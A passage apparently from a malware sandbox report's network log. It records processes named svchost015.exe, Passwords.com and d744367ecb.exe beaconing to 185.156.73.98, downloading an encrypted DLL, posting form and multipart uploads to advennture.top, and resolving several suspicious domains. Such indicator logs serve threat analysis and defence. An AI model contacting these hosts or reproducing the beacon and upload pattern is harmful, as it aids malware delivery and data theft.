                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 21
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/update
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /update HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:26 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                    Content-Length: 99856
                    Keep-Alive: timeout=5, max=99
                    Connection: Keep-Alive
                    Content-Type: application/octet-stream
                  • flag-nl
                    GET
                    http://185.156.73.98/service
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /service HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:27 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=98
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/service
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /service HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:29 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=97
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/service
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /service HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:31 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=96
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/service
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /service HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:33 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=95
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/service
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /service HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:35 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=94
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/service
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /service HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:37 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=93
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/service
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /service HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:39 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=92
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/service
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /service HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:42 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=91
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/service
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /service HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:44 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=90
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/service
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /service HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:46 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=89
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/service
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /service HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:48 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=88
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/success?substr=mixthree&s=three&sub=none
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /success?substr=mixthree&s=three&sub=none HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:26 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/info
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /info HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:31 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 21
                    Keep-Alive: timeout=5, max=99
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/update
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /update HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:31 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                    Content-Length: 99856
                    Keep-Alive: timeout=5, max=98
                    Connection: Keep-Alive
                    Content-Type: application/octet-stream
                  • flag-nl
                    GET
                    http://185.156.73.98/service
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /service HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:32 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=97
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/service
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /service HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:34 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=96
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/service
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /service HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:36 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=95
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/service
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /service HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:38 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=94
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/service
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /service HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:40 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=93
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/service
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /service HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:43 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=92
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/service
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /service HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:45 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=91
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/service
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /service HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:47 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=90
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/service
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /service HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:49 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=89
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/service
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /service HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:51 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=88
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/service
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /service HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:53 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=87
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-us
                    DNS
                    TRnueDLgiwI.TRnueDLgiwI
                    Passwords.com
                    Remote address:
                    8.8.8.8:53
                    Request
                    TRnueDLgiwI.TRnueDLgiwI
                    IN A
                    Response
                  • flag-us
                    DNS
                    advennture.top
                    d744367ecb.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    advennture.top
                    IN A
                    Response
                    advennture.top
                    IN A
                    104.21.25.9
                    advennture.top
                    IN A
                    172.67.221.138
                  • flag-us
                    POST
                    https://advennture.top/GKsiio
                    Passwords.com
                    Remote address:
                    104.21.25.9:443
                    Request
                    POST /GKsiio HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                    Content-Length: 59
                    Host: advennture.top
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:45 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Vary: Accept-Encoding
                    cf-cache-status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GDyM2iYhLyV4UM%2FauY7Nlr3iSPPcWVIVJM%2FihcJme8d18YgACo72yr2S%2BwveUmrkde5GVZ4pFEcGx3N0VXotveLOssyuzdn8RjvrsbHhOHXZYJ0t%2FsqMpO12vQ2CR3ouEw%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 927fe3bacdfebf0a-LHR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=46567&min_rtt=43079&rtt_var=15443&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2852&recv_bytes=630&delivery_rate=80254&cwnd=253&unsent_bytes=0&cid=d1aae67db3d5ad6e&ts=265&x=0"
                  • flag-us
                    POST
                    https://advennture.top/GKsiio
                    Passwords.com
                    Remote address:
                    104.21.25.9:443
                    Request
                    POST /GKsiio HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: multipart/form-data; boundary=ht91Q859lzvhWC2j
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                    Content-Length: 1510
                    Host: advennture.top
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:45 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Vary: Accept-Encoding
                    cf-cache-status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2HlepEScN8W4BJ%2FBL9ySiVeFiA6U%2F4o1dty3CAUa71AN3jzhYWI17%2BfItOhBWE0Bpf1hKJOBrls9KcA3K3VqJRrW7mhuw%2B3hUz3Nvr1GJG79Xv4WXiMu%2FNxTlY0RMgnckw%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 927fe3bc4f7bbf0a-LHR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=46283&min_rtt=43079&rtt_var=12150&sent=10&recv=11&lost=0&retrans=0&sent_bytes=3806&recv_bytes=2480&delivery_rate=80254&cwnd=255&unsent_bytes=0&cid=d1aae67db3d5ad6e&ts=446&x=0"
                  • flag-us
                    POST
                    https://advennture.top/GKsiio
                    Passwords.com
                    Remote address:
                    104.21.25.9:443
                    Request
                    POST /GKsiio HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: multipart/form-data; boundary=Mndv7xnv3A7p
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                    Content-Length: 1064
                    Host: advennture.top
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:45 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Server: cloudflare
                    Vary: Accept-Encoding
                    Cf-Cache-Status: DYNAMIC
                    CF-RAY: 927fe3be7bd9ccc1-LHR
                    alt-svc: h3=":443"; ma=86400
                  • flag-us
                    POST
                    https://advennture.top/GKsiio
                    Passwords.com
                    Remote address:
                    104.21.25.9:443
                    Request
                    POST /GKsiio HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                    Content-Length: 97
                    Host: advennture.top
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:46 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Vary: Accept-Encoding
                    cf-cache-status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZT2MCujbfNsDgCc5AdDpowW8Mzbj9Xl82Z0grtJ4V8QyGU6LSzDWJps%2Fxn5yqCXX0SAdJsV%2BAZKcSoIQB3OZFkTJlXoPb21P%2FgaT%2FnHcE3W5mmdAwP0yL5EAsaYyZp1nyw%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 927fe3c0ad2e6325-LHR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=44954&min_rtt=43742&rtt_var=11262&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=678&delivery_rate=82475&cwnd=253&unsent_bytes=0&cid=e6bc4a1e331e7c8a&ts=241&x=0"
                  • flag-us
                    DNS
                    esccapewz.run
                    d744367ecb.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    esccapewz.run
                    IN A
                    Response
                  • flag-us
                    DNS
                    esccapewz.run
                    d744367ecb.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    esccapewz.run
                    IN A
                  • flag-us
                    DNS
                    travewlio.shop
                    d744367ecb.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    travewlio.shop
                    IN A
                    Response
                  • flag-us
                    DNS
                    touvrlane.bet
                    d744367ecb.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    touvrlane.bet
                    IN A
                    Response
                  • flag-us
                    DNS
                    wxayfarer.live
